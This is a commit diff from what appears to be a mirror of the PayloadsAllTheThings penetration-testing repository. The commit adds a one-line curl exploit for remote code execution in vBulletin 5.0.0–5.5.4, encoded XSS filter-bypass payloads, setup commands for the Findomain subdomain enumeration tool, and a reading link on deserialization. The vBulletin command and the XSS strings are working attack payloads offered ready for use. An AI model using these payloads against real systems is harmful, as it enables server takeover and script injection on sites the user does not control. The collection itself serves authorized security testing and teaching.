daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

RCE vBulletin + findomain

patch-1
Swissky 2019-09-26 20:41:01 +02:00
parent 9a02958b51
commit 3221197b1e
4 changed files with 17 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh Normal file
View File

@ -0,0 +1 @@
curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"

3
Insecure Deserialization/README.md
View File

@ -24,4 +24,5 @@ Check the following sub-sections, located in other files :
* [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
* [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg
* [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)

12
Methodology and Resources/Subdomains Enumeration.md
View File

@ -9,6 +9,7 @@
* EyeWitness * EyeWitness
* Sublist3r * Sublist3r
* Subfinder * Subfinder
* Findomain
* Aquatone (Ruby and Go versions) * Aquatone (Ruby and Go versions)
* AltDNS * AltDNS
* MassDNS * MassDNS
@ -86,6 +87,17 @@ go get github.com/subfinder/subfinder
./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt
``` ```
### Using Findomain
```powershell
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ findomain_spyse_token="YourAccessToken"
$ findomain_virustotal_token="YourAccessToken"
$ findomain_fb_token="YourAccessToken"
$ ./findomain-linux -t example.com -o
```
### Using Aquatone - old version (Ruby) ### Using Aquatone - old version (Ruby)
```powershell ```powershell

2
XSS Injection/README.md
View File

@ -751,6 +751,8 @@ You don't need to close your tags.
```javascript ```javascript
%26%2397;lert(1) %26%2397;lert(1)
alert
></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
``` ```
### Bypass using Katana ### Bypass using Katana